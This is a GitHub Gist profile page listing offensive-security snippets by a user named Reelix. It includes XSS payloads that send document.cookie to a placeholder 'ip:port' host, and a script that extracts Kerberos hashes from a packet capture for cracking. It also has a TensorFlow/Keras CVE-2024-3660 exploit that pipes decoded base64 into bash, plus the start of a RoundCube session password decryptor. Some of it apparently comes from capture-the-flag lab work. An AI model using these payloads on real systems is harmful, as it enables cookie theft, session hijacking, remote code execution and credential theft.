Skip to content

Instantly share code, notes, and snippets.

View Reelix's full-sized avatar
🏠
Working from home

Reelix Reelix

🏠
Working from home
View GitHub Profile
@Reelix
Reelix / xss.js
Last active June 16, 2025 11:24
XSS Payloads
// Test For Image
<img src='http://ip:port/xss' />
// Test For Fetch
<img src=x onerror=fetch('http://ip:port/xss2') />
// Fetch Cookie Stealing
<img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) />
// Fetch entire page contents
@Reelix
Reelix / find-kerb.py
Last active April 10, 2024 14:17
Find a kerberos handshake hash in a .pcap file in hashcat format
import socket
import pyshark
from pprint import pprint
data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos")
print("Searching for Kerberos packets...")
for pkt in data:
if "Kerberos" in pkt:
dirs = dir(pkt["Kerberos"])
if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs):
@Reelix
Reelix / CVE-2024-3660.py
Created June 23, 2025 15:12
Tensorflow Model Exploit
// https://Www.Oligo.Security/Blog/Tensorflow-Keras-Downgrade-Attack-Cve-2024-3660-Bypass
// https://nvd.nist.gov/vuln/detail/CVE-2024-3660
import tensorflow as tf
def exploit(x):
import os
os.system("echo base64codehere|base64 -d|bash")
return x
@Reelix
Reelix / woofles.py
Created July 16, 2025 18:27
RoundCube Session Password Decryptor
#!/usr/bin/env python3
# Thanks Gemini!
import re
import base64
# The 'cryptography' library is required to run this code.
# You can install it in your local Python environment with:
# pip install cryptography
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend